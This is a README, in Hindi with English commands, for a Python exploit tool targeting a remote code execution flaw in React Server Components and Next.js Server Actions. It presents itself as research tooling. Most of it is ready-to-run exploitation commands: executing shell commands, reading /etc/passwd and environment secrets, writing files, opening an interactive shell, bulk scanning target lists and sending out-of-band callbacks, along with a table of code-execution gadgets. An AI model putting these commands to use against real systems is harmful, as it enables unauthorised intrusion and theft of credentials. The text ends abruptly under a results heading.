CVE-2025-55182 - React Server Components RCE एक्सप्लॉइट v2.0
React Server Components (RSC) और Next.js Server Actions में CVE-2025-55182 और CVE-2025-66478 कमजोरियों के परीक्षण के लिए एक व्यापक सुरक्षा अनुसंधान उपकरण।
कमजोरी सिंहावलोकन
| गुण | मान |
|---|
| CVE ID | CVE-2025-55182, CVE-2025-66478 |
| CVSS स्कोर | 10.0 (CRITICAL) |
| प्रभावित संस्करण | React < 19.2.0, Next.js < 15.0.5 |
| कमजोरी प्रकार | Remote Code Execution (RCE) |
| हमला वेक्टर | नेटवर्क |
विशेषताएँ
- PortSwigger-शैली कमजोरी स्कैनिंग, कई डिटेक्शन पेलोड के साथ
- कई RCE गैजेट्स (execSync, spawnSync, vm.runInThisContext, आदि)
- ब्लाइंड RCE सत्यापन के लिए आउट-ऑफ-बैंड (OOB) कॉलबैक परीक्षण
- फ़ाइल पढ़ने/लिखने की क्षमताएँ
- JavaScript कोड निष्पादन
- इंटरैक्टिव शेल मोड
- मल्टी-थ्रेडिंग के साथ बल्क स्कैनिंग
- प्रॉक्सी समर्थन (Burp Suite संगत)
- JSON/टेक्स्ट आउटपुट प्रारूप
इंस्टॉलेशन
आवश्यकताएँ
pip install requests
Python संस्करण
त्वरित प्रारंभ
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan
# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Interactive shell
python3 exploit-custom.py -u https://target.com --shell
उपयोग
कमांड लाइन तर्क
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
लक्ष्य चयन
| तर्क | विवरण | उदाहरण |
|---|
-u, --url | एकल लक्ष्य URL | -u https://target.com |
-l, --list | URL वाली फ़ाइल | -l targets.txt |
स्कैनिंग मोड
| तर्क | विवरण |
|---|
--detect | Next.js/RSC उपयोग का पता लगाएँ |
--check | त्वरित कमजोरी जाँच (गणित परीक्षण) |
--scan | पूर्ण कमजोरी स्कैन (PortSwigger शैली) |
--test-all | सभी गैजेट्स और डिटेक्शन पेलोड का परीक्षण करें |
शोषण
| तर्क | विवरण | उदाहरण |
|---|
--cmd | शेल कमांड निष्पादित करें | --cmd "id" |
--gadget | उपयोग के लिए गैजेट निर्दिष्ट करें | --gadget execSync |
--read | लक्ष्य से फ़ाइल पढ़ें | --read /etc/passwd |
--write | लक्ष्य पर फ़ाइल लिखें | --write /tmp/test.txt "content" |
--js | JavaScript कोड निष्पादित करें | --js "process.env" |
--shell | इंटरैक्टिव शेल प्रारंभ करें | --shell |
--oob | OOB कॉलबैक होस्ट | --oob xyz.oastify.com |
कनेक्शन विकल्प
| तर्क | विवरण | उदाहरण |
|---|
-p, --proxy | HTTP/HTTPS प्रॉक्सी | -p http://127.0.0.1:8080 |
-c, --cookies | कुकी स्ट्रिंग | -c "session=abc123" |
-H, --header | अतिरिक्त हेडर (दोहराने योग्य) | -H "X-Custom: value" |
-t, --threads | बल्क स्कैन के लिए थ्रेड संख्या | -t 20 |
--timeout | सेकंड में अनुरोध टाइमआउट | --timeout 60 |
आउटपुट विकल्प
| तर्क | विवरण |
|---|
-o, --output | परिणाम फ़ाइल में सहेजें (.json या .txt) |
-q, --quiet | बैनर छुपाएँ |
स्कैनिंग उदाहरण
एकल लक्ष्य
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect
# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan
# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
बल्क स्कैनिंग
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json
# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
शोषण उदाहरण
कमांड निष्पादन
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
फ़ाइल संचालन
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
JavaScript निष्पादन
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
इंटरैक्टिव शेल
python3 exploit-custom.py -u https://target.com --shell
शेल कमांड:
| कमांड | विवरण |
|---|
<command> | शेल कमांड निष्पादित करें |
!read <file> | फ़ाइल पढ़ें |
!write <file> <content> | फ़ाइल लिखें |
!js <code> | JavaScript निष्पादित करें |
!gadget <name> | गैजेट बदलें |
exit | शेल से बाहर निकलें |
उपलब्ध गैजेट्स
RCE गैजेट्स
| नाम | मॉड्यूल ID | विवरण |
|---|
execSync | child_process#execSync | सीधा शेल कमांड निष्पादन |
execFileSync | child_process#execFileSync | बाइनरी फ़ाइल निष्पादित करें |
spawnSync | child_process#spawnSync | तर्कों के साथ प्रोसेस स्पॉन करें |
vm_runInThisContext | vm#runInThisContext | वर्तमान संदर्भ में JS निष्पादित करें |
vm_runInNewContext | vm#runInNewContext | सैंडबॉक्स एस्केप के साथ JS निष्पादित करें |
vm_runInThisContext_global | vm#runInThisContext | global.process के माध्यम से निष्पादित करें |
फ़ाइल गैजेट्स
| नाम | मॉड्यूल ID | विवरण |
|---|
fs_readFileSync | fs#readFileSync | मनमानी फ़ाइलें पढ़ें |
fs_writeFileSync | fs#writeFileSync | मनमानी फ़ाइलें लिखें |
OOB गैजेट्स
| नाम | विवरण |
|---|
vm_fetch | fetch API के माध्यम से HTTP अनुरोध (Node 18+) |
vm_http | http मॉड्यूल के माध्यम से HTTP अनुरोध |
डिटेक्शन पेलोड (CVE-2025-66478)
--scan मोड इन PortSwigger-शैली डिटेक्शन पेलोड का उपयोग करता है:
| पेलोड | विवरण |
|---|
property_reference | कोलन-सीमांकित प्रॉपर्टी रेफरेंस ["$1:a:a"] |
property_reference_v2 | वैकल्पिक रेफरेंस ["$1:b:b"] |
property_reference_constructor | प्रॉपर्टी रेफरेंस के माध्यम से कंस्ट्रक्टर एक्सेस |
property_reference_proto | प्रॉपर्टी रेफरेंस के माध्यम से प्रोटो चेन एक्सेस |
action_ref_vm | vm#runInThisContext के साथ ACTION_REF |
action_ref_execSync | child_process#execSync के साथ ACTION_REF |
OOB कॉलबैक विधियाँ
यह उपकरण कई OOB कॉलबैक विधियों का समर्थन करता है:
| विधि | विवरण |
|---|
curl | curl कमांड के माध्यम से HTTP अनुरोध |
wget | wget कमांड के माध्यम से HTTP अनुरोध |
nslookup | DNS क्वेरी |
ping | ICMP पिंग |
fetch | Node.js fetch API |
http | Node.js http मॉड्यूल |
आउटपुट व्याख्या
टर्मिनल रंग
| रंग | स्थिति | अर्थ |
|---|
| हरा | [VULN] | कमजोर - RCE की पुष्टि हुई |
| पीला | [PATCH] | पैच किया गया - Server Actions सक्रिय लेकिन सुरक्षित |
| नीला | [RSC] | Server Actions का पता चला |
| सियान | [NEXT] | Next.js का पता चला |
| लाल | [ERR] | कनेक्शन त्रुटि |
स्कैन परिणाम